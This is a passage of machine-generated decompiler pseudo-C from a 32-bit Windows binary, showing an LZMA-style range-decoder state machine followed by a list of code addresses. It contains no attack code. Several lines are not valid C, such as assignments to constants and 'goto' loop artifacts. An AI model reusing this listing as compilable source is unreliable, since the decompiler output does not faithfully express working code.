											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x0040664d
0x0040664d
0x00406651
0x0040667a
0x00406684
0x00406653
0x0040665c
0x00406669
0x0040666c
0x004069b0
0x004069b0
0x004069b3
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00000000
0x00000000
0x00406a01
0x00406a05
0x00406bb4
0x00406bca
0x00406bd2
0x00406bd9
0x00406bdb
0x00406be2
